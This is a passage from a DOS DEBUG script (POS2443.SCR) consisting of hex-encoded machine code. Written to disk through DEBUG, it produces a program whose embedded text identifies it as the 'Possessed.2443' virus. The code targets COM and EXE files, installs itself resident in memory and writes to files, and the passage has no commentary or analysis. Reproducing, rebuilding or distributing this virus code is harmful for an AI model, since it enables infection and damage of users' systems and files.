E 06B0 8B CB 03 0E 7F 01 8A 54 01 03 16 81 01 B4 0C CD
E 06C0 10 83 C6 02 EB E4 5E 32 C0 59 E2 DC 5E C3 C7 44
E 06D0 12 70 19 8B 44 0E 05 10 00 2E A3 73 00 8B 44 10
E 06E0 2E A3 75 00 8B 44 14 2E A3 79 00 8B 44 16 05 10
E 06F0 00 2E A3 77 00 8B 44 04 83 7C 02 00 74 01 48 BB
E 0700 00 02 F7 E3 03 44 02 83 D2 00 05 0F 00 83 D2 00
E 0710 25 F0 FF 2E A3 7B 00 2E 89 16 7D 00 05 8B 09 83
E 0720 D2 00 72 5E F7 F3 0B D2 74 01 40 89 44 04 89 54
E 0730 02 2E A1 7B 00 2E 8B 16 7D 00 BB 10 00 F7 F3 2B
E 0740 44 08 2D 10 00 89 44 16 C7 44 14 15 08 89 44 0E
E 0750 C7 44 10 8B 0A 2E 8B 1E 61 00 E8 56 00 B9 1C 00
E 0760 33 D2 B4 40 E8 31 00 0E 1F 8B 16 7B 00 8B 0E 7D
E 0770 00 B8 00 42 E8 21 00 BA 00 00 B9 8B 09 B4 40 E8
E 0780 16 00 E9 5B FD 33 C0 8E C0 26 8E 16 F6 01 26 8B
E 0790 26 F4 01 58 07 5D F9 C3 55 06 50 33 C0 8E C0 26
E 07A0 89 26 F4 01 26 8C 16 F6 01 58 07 9C 2E FF 1E 4F
E 07B0 00 5D C3 33 C9 8B D1 B8 00 42 E8 DB FF C3 B4 02
E 07C0 33 DB CD 10 C3 51 56 28 04 46 E2 FB 5E 59 C3 56
E 07D0 51 FC F3 A6 74 01 F9 59 5E C3 5A 66 64 64 58 65
E 07E0 5B 45 5A 66 64 32 75 74 78 78 6A 78 78 6A 69 46
E 07F0 45 67 9C 86 46 45 8D 86 46 45 8D 86 46 45 8D 86
E 0800 46 45 8D 86 46 49 2D 45 2F 32 66 9A 99 8D 94 97
E 0810 5F 45 6F 94 93 6F 94 93 45 6C 9A 92 87 86 45 94
E 0820 8B 45 66 89 7A 2F 3F 41 4B 42 4B 42 4C 43 4C 44
E 0830 4C 45 4C 43 4D 46 4D 47 4D 44 4E 48 4E 49 4E 4A
E 0840 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A B5 4B B4 4B B3
E 0850 4B B2 4B B4 4C B1 4C B0 4C B3 4D AF 4D AE 4D AD
E 0860 4D B2 4E AC 4E AB 4E 4C 54 4C 55 4D 55 4E 55 4F
E 0870 56 50 56 51 56 52 56 53 56 54 57 55 57 56 57 57
E 0880 57 58 57 59 58 5A 58 5B 58 5C 58 5D 58 5A 59 5B
E 0890 59 5C 59 5D 59 60 59 5F 59 60 59 61 59 62 59 5B
E 08A0 5A 5C 5A 63 5A 64 5A 65 5A 66 5A 67 5A 5C 5B 68
E 08B0 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C 6E 5C 6F 5C 70
E 08C0 5D B1 53 B0 54 AF 54 AE 54 AD 55 AC 55 AB 55 AA
E 08D0 55 A9 55 A8 55 A7 56 A6 56 A5 56 A4 56 A3 56 A2
E 08E0 57 A1 57 A0 57 9F 57 9E 57 9D 57 9C 58 9B 58 9A
E 08F0 58 99 58 98 58 9A 59 99 59 98 59 97 59 96 59 95
E 0900 59 94 59 93 59 92 59 99 5A 98 5A 91 5A 90 5A 8F
E 0910 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B 8A 5B 89 5B 88
E 0920 5B 87 5B 86 5C 85 5C 84 5C 83 5C 76 63 75 64 75
E 0930 65 74 66 74 67 73 68 73 69 72 6A 71 6B 71 6C 70
E 0940 6D 70 6E 6F 6F 6E 70 6E 71 7B 71 6D 72 7A 72 79
E 0950 72 6D 73 78 73 77 73 76 73 75 73 6C 74 71 74 72
E 0960 74 73 74 74 74 6C 75 6D 75 6E 75 6F 75 70 75 6B
E 0970 76 6C 76 6D 81 6E 81 6F 81 70 80 71 80 72 80 73
E 0980 80 74 7F 75 7F 76 7F 77 7F 78 7E 79 7E 7A 7E 7B
E 0990 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D 81 7C 82 7C 83
E 09A0 7C 84 7C 85 7B 86 7B 87 7B 88 7B 89 7A 8A 7A 8B
E 09B0 7A 8C 7A 8D 79 8E 79 8F 79 90 79 91 78 92 78 93
E 09C0 78 94 77 95 77 96 76 97 76 98 75 00 43 3A 2A 2E
E 09D0 43 4F 4D 00 43 3A 2A 2E 45 58 45 00 06 33 C0 8E
E 09E0 C0 26 80 3E EC 01 00 75 06 BE 00 01 E9 E8 01 07
E 09F0 8C C0 2E 03 06 73 01 8E D0 2E 8B 26 75 01 8C C0
E 0A00 2E 03 06 77 01 2E A3 51 01 2E A1 79 01 2E A3 4F
E 0A10 01 F8 2E FF 2E 4F 01 FC F3 A4 33 C0 8E C0 26 C6
E 0A20 06 EC 01 01 58 05 10 00 50 B8 67 07 50 CB 8B C4
E 0A30 2D 00 01 8B E0 8C C8 8E D8 8E D0 1E 2D 10 00 8E
E 0A40 C0 8C 06 81 00 50 26 A1 2C 00 A3 7F 00 58 1E 06
E 0A50 8E D8 0E 07 BE 0A 00 BF 8B 09 B9 06 00 FC F3 A5
E 0A60 BB 19 08 89 1E 0A 00 8C 0E 0C 00 07 1F 07 BE 1E
E 0A70 05 B9 42 00 51 B0 25 E8 4B FD BF 08 00 56 FC F3
E 0A80 A4 5E 59 F6 D8 E8 3D FD A1 15 07 05 1B 02 CD 21
E 0A90 89 1E 4F 00 8C 06 51 00 BA 4A 00 80 EC 10 E8 F7
E 0AA0 FC C7 06 6B 00 00 00 8A 16 6E 00 88 16 6D 00 05
E 0AB0 E7 0F E8 E3 FC 89 1E 53 00 8C 06 55 00 BA 6A 03
E 0AC0 80 EC 10 E8 D2 FC 0E 1F 8E 06 81 00 B4 49 E8 C7
E 0AD0 FC BA 8B 09 B1 04 D3 EA 83 C2 20 B4 31 E8 B8 FC
E 0AE0 0E 0E 1F 8E 06 81 00 BE 8B 09 BF 0A 00 B9 06 00
E 0AF0 FC F3 A5 07 80 3E 4E 00 01 75 08 C6 06 4E 00 00
E 0B00 E9 97 00 A1 81 00 BE 9A 09 89 44 04 C7 44 02 80
E 0B10 00 89 44 08 C7 44 06 5C 00 89 44 0C C7 44 0A 6C
E 0B20 00 A1 7F 00 89 04 B4 30 CD 21 A2 4D 00 3C 03 72
E 0B30 1F 8E 1E 7F 00 33 F6 B9 C8 00 80 3C 01 75 0E 80
E 0B40 7C 03 3A 75 08 8B D6 83 C2 02 EB 15 90 46 E2 EA
E 0B50 0E 1F BE DB 08 BF 8D 09 B9 0D 00 FC F3 A4 BA 8D
E 0B60 09 FA 2E 8C 16 6F 00 2E 89 26 71 00 FB B8 00 4B
E 0B70 BB 9A 09 2E 80 3E 4D 00 03 72 06 E8 1A FC EB 03
E 0B80 90 CD 21 FA 2E 8E 16 6F 00 2E 8B 26 71 00 FB 0E
E 0B90 1F 73 07 BA 08 00 B4 09 CD 21 B4 4D CD 21 B4 4C
E 0BA0 CD 21 50 4F 53 32 34 34 33 2E 43 4F 4D 00 00 81
E 0BB0 C6 00 01 06 33 C0 8E C0 26 83 3E EC 01 00 74 13
E 0BC0 07 83 EE 5A BF 00 01 B9 2D 00 FC F3 A5 BB 00 01
E 0BD0 F8 FF E3 81 EE 8B 09 07 0E 1F BF 00 01 B9 10 09
E 0BE0 D1 E9 FC F3 A5 B9 7B 00 8C 06 51 01 C7 06 4F 01
E 0BF0 50 08 06 2E FF 2E 4F 01 E9 B7 01 0D 20 20 20 0D
E 0C00 0A 4D 61 62 75 68 61 79 21 0D 0A 0A 54 68 69 73
E 0C10 20 69 73 20 50 6F 73 73 65 73 73 65 64 2E 32 34
E 0C20 34 33 20 76 69 72 75 73 20 63 6F 6D 69 6E 67 20
E 0C30 74 6F 20 79 6F 75 20 66 72 6F 6D 20 74 68 65 20
E 0C40 50 68 69 6C 69 70 70 69 6E 65 73 2E 0D 0A 42 72
E 0C50 6F 75

RCX
0B52
W
Q

── POS2443.SCR ENDS HERE ──────────────────────────────────────────────

EoF.
